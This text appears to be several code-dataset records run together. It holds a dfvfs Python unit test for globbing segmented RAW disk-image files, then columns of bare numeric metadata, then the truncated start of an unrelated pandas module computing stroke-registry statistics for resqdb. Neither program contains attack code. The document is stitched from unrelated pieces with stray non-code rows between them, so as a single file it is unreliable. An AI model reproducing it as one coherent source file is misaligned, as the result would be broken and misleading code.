from dfvfs.path import fake_path_spec
from dfvfs.path import raw_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import fake_file_system
class GlobRawFileTest(unittest.TestCase):
"""The unit test for the storage media RAW image file glob functionality."""
def _BuildFileFakeFileSystem(
self, segment_filenames, segment_file_path_specs):
"""Builds a fake file system containing storage media RAW segment files.
Args:
filename: the filename of the first segment file with extension.
segment_filenames: a list of segment filenames.
segment_file_path_specs: a list to store the segment file path
specifications in.
Returns:
The fake file system (instance of dvfvs.FakeFileSystem).
"""
resolver_context = context.Context()
file_system = fake_file_system.FakeFileSystem(resolver_context)
file_system.AddFileEntry(
u'/', file_entry_type=definitions.FILE_ENTRY_TYPE_DIRECTORY)
for segment_filename in segment_filenames:
path = u'/{0:s}'.format(segment_filename)
file_system.AddFileEntry(path)
segment_file_path_specs.append(fake_path_spec.FakePathSpec(location=path))
return file_system
def testGlobRawSinglecExtension(self):
"""Test the glob function for a RAW single extension scheme."""
# Test single segment file: dd.
segment_filenames = [u'ímynd.dd']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/ímynd.dd')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: dmg.
segment_filenames = [u'image.dmg']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.dmg')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: img.
segment_filenames = [u'image.img']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.img')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test single segment file: raw.
segment_filenames = [u'image.raw']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.raw')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawAlphabeticalExtension(self):
"""Test the glob function for a RAW alphabetical extension scheme."""
segment_filenames = [u'image.aaa']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: aaa.
path_spec = fake_path_spec.FakePathSpec(location=u'/image.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: aaa.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: aaa-aak.
segment_filenames = [
u'image.aaa', u'image.aab', u'image.aac', u'image.aad', u'image.aae',
u'image.aaf', u'image.aag', u'image.aah', u'image.aai', u'image.aaj',
u'image.aak']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.aaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: AAA-AAk.
segment_filenames = [
u'image.AAA', u'image.AAB', u'image.AAC', u'image.AAD', u'image.AAE',
u'image.AAF', u'image.AAG', u'image.AAH', u'image.AAI', u'image.AAJ',
u'image.AAK']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.AAA')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawAlphabeticalSuffix(self):
"""Test the glob function for a RAW alphabetical suffix scheme."""
segment_filenames = [u'imageaaa']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: aaa.
path_spec = fake_path_spec.FakePathSpec(location=u'/imageaaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: aaa.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogusaaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: aaa-aak.
segment_filenames = [
u'imageaaa', u'imageaab', u'imageaac', u'imageaad', u'imageaae',
u'imageaaf', u'imageaag', u'imageaah', u'imageaai', u'imageaaj',
u'imageaak']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/imageaaa')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: AAA-AAk.
segment_filenames = [
u'imageAAA', u'imageAAB', u'imageAAC', u'imageAAD', u'imageAAE',
u'imageAAF', u'imageAAG', u'imageAAH', u'imageAAI', u'imageAAJ',
u'imageAAK']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/imageAAA')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawNumericExtension(self):
"""Test the glob function for a RAW numeric extension scheme."""
segment_filenames = [u'image.000']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: 000.
path_spec = fake_path_spec.FakePathSpec(location=u'/image.000')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: 000.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus.000')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 000-010.
segment_filenames = [
u'image.000', u'image.001', u'image.002', u'image.003', u'image.004',
u'image.005', u'image.006', u'image.007', u'image.008', u'image.009',
u'image.010']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.000')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 001-010.
segment_filenames = [
u'image.001', u'image.002', u'image.003', u'image.004', u'image.005',
u'image.006', u'image.007', u'image.008', u'image.009', u'image.010']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.001')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 1-10.
segment_filenames = [
u'image.1', u'image.2', u'image.3', u'image.4', u'image.5',
u'image.6', u'image.7', u'image.8', u'image.9', u'image.10']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image.1')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawNumericSuffix(self):
"""Test the glob function for a RAW numeric suffix scheme."""
segment_filenames = [u'image1']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: 000.
path_spec = fake_path_spec.FakePathSpec(location=u'/image1')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: 000.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus1')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 000-010.
segment_filenames = [
u'image0', u'image1', u'image2', u'image3', u'image4', u'image5',
u'image6', u'image7', u'image8', u'image9', u'image10']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image0')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 1-10.
segment_filenames = [
u'image1', u'image2', u'image3', u'image4', u'image5',
u'image6', u'image7', u'image8', u'image9', u'image10']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image1')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 001-010.
segment_filenames = [
u'image001', u'image002', u'image003', u'image004', u'image005',
u'image006', u'image007', u'image008', u'image009', u'image010']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image001')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawAsbExtension(self):
"""Test the glob function for a RAW ASB extension scheme."""
segment_filenames = [u'image001.asb']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: 001.
path_spec = fake_path_spec.FakePathSpec(location=u'/image001.asb')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: 001.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus000.asb')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 001-010.
segment_filenames = [
u'image001.asb', u'image002.asb', u'image003.asb', u'image004.asb',
u'image005.asb', u'image006.asb', u'image007.asb', u'image008.asb',
u'image009.asb', u'image010.asb']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image001.asb')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
def testGlobRawVmdkExtension(self):
"""Test the glob function for a RAW VMDK extension scheme."""
segment_filenames = [u'image-f001.vmdk']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
# Test single segment file: 001.
path_spec = fake_path_spec.FakePathSpec(location=u'/image-f001.vmdk')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test non exiting segment file: 001.
expected_segment_file_path_specs = []
path_spec = fake_path_spec.FakePathSpec(location=u'/bogus-f000.vmdk')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
# Test multiple segment files: 001-010.
segment_filenames = [
u'image-f001.vmdk', u'image-f002.vmdk', u'image-f003.vmdk',
u'image-f004.vmdk', u'image-f005.vmdk', u'image-f006.vmdk',
u'image-f007.vmdk', u'image-f008.vmdk', u'image-f009.vmdk',
u'image-f010.vmdk']
expected_segment_file_path_specs = []
file_system = self._BuildFileFakeFileSystem(
segment_filenames, expected_segment_file_path_specs)
path_spec = fake_path_spec.FakePathSpec(location=u'/image-f001.vmdk')
path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
segment_file_path_specs = raw.RawGlobPathSpec(file_system, path_spec)
self.assertEqual(
len(segment_file_path_specs), len(expected_segment_file_path_specs))
self.assertEqual(
segment_file_path_specs, expected_segment_file_path_specs)
if __name__ == '__main__':
unittest.main()
| 41.695565
| 80
| 0.748175
| 2,708
| 20,681
| 5.322378
| 0.067578
| 0.161035
| 0.201901
| 0.267814
| 0.883577
| 0.873794
| 0.856241
| 0.856241
| 0.849997
| 0.839034
| 0
| 0.017467
| 0.161211
| 20,681
| 495
| 81
| 41.779798
| 0.813397
| 0.093371
| 0
| 0.76
| 0
| 0
| 0.080914
| 0
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.022857
| false
| 0
| 0.02
| 0
| 0.048571
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
61633ee4b11cae72781872ad72fdde6424de3acc
| 240,628
|
py
|
Python
|
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
Calculation.py
|
atranel/resqdb
|
76b8a5089732ae63c867b734c5053908687122bc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 09 13:28:05 2017
@author: Marie Jankujova
"""
import sys
import os
from datetime import datetime, time, date
import pandas as pd
import numpy as np
from numpy import inf
import pytz
import logging
import scipy.stats as st
from scipy.stats import sem, t
from scipy import mean
class FilterDataset:
""" The class filtrating the dataframe by date or by country.
:param df: the dataframe containing preprocessed data
:type df: dataframe
:param country: the country code to be included in the data
:type country: str
:param date1: the first date included in the filtered dataframe
:type date1: date
:param date2: the last date included in the filtered dataframe
:type date2: date
:param column: the column used as main for filtration
:type column: str
:param by_columns: True if data should be filtered by hospital and discharge date together
:type by_columns: boolean
"""
def __init__(self, df, country=None, date1=None, date2=None, column='DISCHARGE_DATE', by_columns=False):
debug = 'debug_' + datetime.now().strftime('%d-%m-%Y') + '.log'
log_file = os.path.join(os.getcwd(), debug)
logging.basicConfig(filename=log_file,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.DEBUG)
self.fdf = df.copy()
self.country = country
self.date1 = date1
self.date2 = date2
if self.country is not None:
# Append "_" to the country code, because e.g. ES_MD was included in dataset for MD as well.
country = self.country + "_"
self.fdf = self._filter_by_country()
logging.info('FilterDataset: Data have been filtered for country {0}!'.format(self.country))
if self.date1 is not None and self.date2 is not None:
if not by_columns:
if column == 'DISCHARGE_DATE':
self.fdf = self._filter_by_date()
logging.info('FilterDataset: Data have been filtered for date {0} - {1}!'.format(self.date1, self.date2))
elif column == 'HOSPITAL_DATE':
self.fdf = self._filter_by_hospital_date()
logging.info('FilterDataset: Data have been filtered by hospital date for dates {} - {}!'.format(self.date1, self.date2))
else:
self.fdf = self._filter_by_hospital_and_discharge_date()
logging.info('FilterDataset: Data have been filtered by hospital or discharge date for dates {} - {}!'.format(self.date1, self.date2))
def _filter_by_country(self):
""" The function filtering dataframe by country.
:returns: df -- the dataframe including only rows containing in Protocol ID the country code
"""
df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True].copy()
return df
def _filter_by_date(self):
""" The function filtering dataframe by discharge date.
:returns: df -- the dataframe including only rows where discharge date is in the period (date1, date2)
"""
df = self.fdf[(self.fdf['DISCHARGE_DATE'] >= self.date1) & (self.fdf['DISCHARGE_DATE'] <= self.date2)].copy()
return df
def _filter_by_hospital_date(self):
''' The function filtering dataframe by admission date.
:returns df: the dataframe including only rows where admission date is between these two days
'''
df = self.fdf[(self.fdf['HOSPITAL_DATE'] >= self.date1) & (self.fdf['HOSPITAL_DATE'] <= self.date2)].copy()
return df
def _filter_by_hospital_and_discharge_date(self):
''' The function filters dataframe by admission and discharge date. Eg. include patient if hospital date or discharge date are in the range.
'''
df = self.fdf[((self.fdf['HOSPITAL_DATE'] >= self.date1) & (self.fdf['HOSPITAL_DATE'] <= self.date2)) | ((self.fdf['DISCHARGE_DATE'] >= self.date1) & (self.fdf['DISCHARGE_DATE'] <= self.date2))].copy()
return df
class ComputeStats:
""" The class calculating the general statistics from the preprocessed and filtered data.
:param df: the dataframe containing preprocessed data
:type df: dataframe
:param country: the results for whole country included in the statistics
:type country: bool
:param country_code: the country code used in the names of output files
:type country_code: str
:param comparison: the value saying if it is comparative statistics
:type comparison: bool
:param patient_limit: the number of patients used as limit when evaluating angels awards (default is 30)
:type patiet_limit: int
:param period: the name of the period (default is None)
:type period: str
"""
def __init__(self, df, country = False, country_code = "", comparison=False, patient_limit=30, period=None, raw_data=None):
self.df = df.copy()
self.df.fillna(0, inplace=True)
self.patient_limit = patient_limit
self.period = period
self.raw_data = raw_data
# Rename 'RES-Q reports name' column to 'Site Name'
if 'ESO Angels name' in self.df.columns:
self.df.drop('Site Name', inplace=True, axis=1)
self.df.rename(columns={'ESO Angels name': 'Site Name'}, inplace=True)
def get_country_name(value):
""" The function returning the country name based on country code.
:returns: country_name -- name of the country
"""
if value == "UZB":
value = 'UZ'
country_name = pytz.country_names[value]
return country_name
#if comparison == False:
#self.df['Protocol ID'] = self.df.apply(lambda row: row['Protocol ID'].split()[2] if (len(row['Protocol ID'].split()) == 3) else row['Protocol ID'].split()[0], axis=1)
# uncomment if you want stats between countries and set comparison == True
# self.df['Protocol ID'] = self.df.apply(lambda x: x['Protocol ID'].split("_")[0], axis=1)
# If you want to compare, instead of Site Names will be Country names.
if comparison:
self.df['Protocol ID'] = self.df['Country']
self.df['Site Name'] = self.df['Country']
#if self.df['Protocol ID'].dtype == np.object:
#self.df['Site Name'] = self.df.apply(lambda x: get_country_name(x['Protocol ID']) if get_country_name(x['Protocol ID']) != "" else x['Protocol ID'], axis=1)
if (country):
country_df = self.df.copy()
#self.country_name = pytz.country_names[country_code]
# country['Protocol ID'] = self.country_name
#country['Site Name'] = self.country_name
country_df['Protocol ID'] = country_df['Country']
country_df['Site Name'] = country_df['Country']
self.df = pd.concat([self.df, country_df])
self._country_name = country_df['Country'].iloc[0]
else:
self._country_name = ""
self.statsDf = self.df.groupby(['Protocol ID', 'Site Name']).size().reset_index(name="Total Patients")
# self.statsDf['Site Name'] =
self.statsDf = self.statsDf[['Protocol ID', 'Site Name', 'Total Patients']]
self.statsDf['Median patient age'] = self.df.groupby(['Protocol ID']).AGE.agg(['median']).rename(columns={'median': 'Median patient age'})['Median patient age'].tolist()
# get patietns with ischemic stroke (ISch) (1)
isch = self.df[self.df['STROKE_TYPE'].isin([1])]
self.statsDf['isch_patients'] = self._count_patients(dataframe=isch)
# get patietns with ischemic stroke (IS), intracerebral hemorrhage (ICH), transient ischemic attack (TIA) or cerebral venous thrombosis (CVT) (1, 2, 3, 5)
is_ich_tia_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 3, 5])]
self.statsDf['is_ich_tia_cvt_patients'] = self._count_patients(dataframe=is_ich_tia_cvt)
# get patietns with ischemic stroke (IS), intracerebral hemorrhage (ICH), or cerebral venous thrombosis (CVT) (1, 2, 5)
is_ich_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 5])]
self.statsDf['is_ich_cvt_patients'] = self._count_patients(dataframe=is_ich_cvt)
# Get dataframe with patients who had ischemic stroke (IS) or intracerebral hemorrhage (ICH)
is_ich = self.df[self.df['STROKE_TYPE'].isin([1,2])]
self.statsDf['is_ich_patients'] = self._count_patients(dataframe=is_ich)
# get patietns with ischemic stroke (IS) and transient ischemic attack (TIA) (1, 3)
is_tia = self.df[self.df['STROKE_TYPE'].isin([1, 3])]
self.statsDf['is_tia_patients'] = self._count_patients(dataframe=is_tia)
# get patietns with ischemic stroke (IS), intracerebral hemorrhage (ICH), subarrachnoid hemorrhage (SAH) or cerebral venous thrombosis (CVT) (1, 2, 4, 5)
is_ich_sah_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 2, 4, 5])]
self.statsDf['is_ich_sah_cvt_patients'] = self._count_patients(dataframe=is_ich_sah_cvt)
# get patietns with ischemic stroke (IS), transient ischemic attack (TIA) or cerebral venous thrombosis (CVT) (1, 3, 5)
is_tia_cvt = self.df[self.df['STROKE_TYPE'].isin([1, 3, 5])]
self.statsDf['is_tia_cvt_patients'] = self._count_patients(dataframe=is_tia_cvt)
# get patients with cerebral venous thrombosis (CVT) (5)
cvt = self.df[self.df['STROKE_TYPE'].isin([5])]
self.statsDf['cvt_patients'] = self._count_patients(dataframe=cvt)
# get patietns with intracerebral hemorrhage (ICH) and subarrachnoid hemorrhage (SAH) (2, 4)
ich_sah = self.df[self.df['STROKE_TYPE'].isin([2, 4])]
self.statsDf['ich_sah_patients'] = self._count_patients(dataframe=ich_sah)
# get patietns with intracerebral hemorrhage (ICH) (2)
ich = self.df[self.df['STROKE_TYPE'].isin([2])]
self.statsDf['ich_patients'] = self._count_patients(dataframe=ich)
# get patietns with subarrachnoid hemorrhage (SAH) (4)
sah = self.df[self.df['STROKE_TYPE'].isin([4])]
self.statsDf['sah_patients'] = self._count_patients(dataframe=sah)
# create subset with no referrals (RECANALIZATION_PROCEDURE != [5,6]) AND (HEMICRANIECTOMY != 3)
discharge_subset = self.df[~self.df['RECANALIZATION_PROCEDURES'].isin([5, 6]) & ~self.df['HEMICRANIECTOMY'].isin([3])]
self.statsDf['discharge_subset_patients'] = self._count_patients(dataframe=discharge_subset)
# Create discharge subset alive
discharge_subset_alive = self.df[~self.df['DISCHARGE_DESTINATION'].isin([5])]
self.statsDf['discharge_subset_alive_patients'] = self._count_patients(dataframe=discharge_subset_alive)
##########
# GENDER #
##########
self.tmp = self.df.groupby(['Protocol ID', 'GENDER']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="GENDER", value=2, new_column_name='# patients female')
self.statsDf['% patients female'] = self.statsDf.apply(lambda x: round(((x['# patients female']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GENDER", value=1, new_column_name='# patients male')
self.statsDf['% patients male'] = self.statsDf.apply(lambda x: round(((x['# patients male']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
# tag::prenotification[]
####################
# PRE-NOTIFICATION #
####################
pt_3_form_version = self.df.loc[self.df['crf_parent_name'] == 'F_RESQV20DEV_PT_3'].copy()
self.statsDf['pt_3_form_total_patients'] = self._count_patients(dataframe=pt_3_form_version)
if not pt_3_form_version.empty:
if country_code == 'PT':
# prenotification
column = 'PRENOTIFICATION'
if column in df.columns:
self.tmp = pt_3_form_version.groupby(['Protocol ID', column]).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name=column, value=1, new_column_name='# pre-notification - Yes')
self.statsDf['% pre-notification - Yes'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - Yes']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name=column, value=2, new_column_name='# pre-notification - No')
self.statsDf['% pre-notification - No'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - No']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name=column, value=3, new_column_name='# pre-notification - Not known')
self.statsDf['% pre-notification - Not known'] = self.statsDf.apply(lambda x: round(((x['# pre-notification - Not known']/x['pt_3_form_total_patients']) * 100), 2) if x['pt_3_form_total_patients'] > 0 else 0, axis=1)
del column
# end::prenotification[]
# tag::mrs_prior_stroke[]
####################
# MRS PRIOR STROKE #
####################
if country_code == 'PT':
# MRS prior to stroke
column = 'MRS_PRIOR_STROKE'
if column in df.columns:
# modify values to represent real values of mRS eg. 1 -> 0 etc.
pt_3_form_version.loc[:, 'ADJUSTED_MRS_PRIOR_STROKE'] = pt_3_form_version[column] - 1
# now our unknown is 7
prior_mrs_known = pt_3_form_version.loc[~pt_3_form_version[column].isin([7])].copy()
self.statsDf = self.statsDf.merge(prior_mrs_known.groupby(['Protocol ID']).ADJUSTED_MRS_PRIOR_STROKE.agg(['median']).rename(columns={'median': 'Median mRS prior to stroke'})['Median mRS prior to stroke'].reset_index(), how='outer')
del column
# end::mrs_prior_stroke[]
del pt_3_form_version
self.statsDf.drop(['pt_3_form_total_patients'], inplace=True, axis=1)
######################
# STROKE IN HOSPITAL #
######################
self.tmp = self.df.groupby(['Protocol ID', 'HOSPITAL_STROKE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HOSPITAL_STROKE", value=1, new_column_name='# patients having stroke in the hospital - Yes')
self.statsDf['% patients having stroke in the hospital - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients having stroke in the hospital - Yes']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITAL_STROKE", value=2, new_column_name='# patients having stroke in the hospital - No')
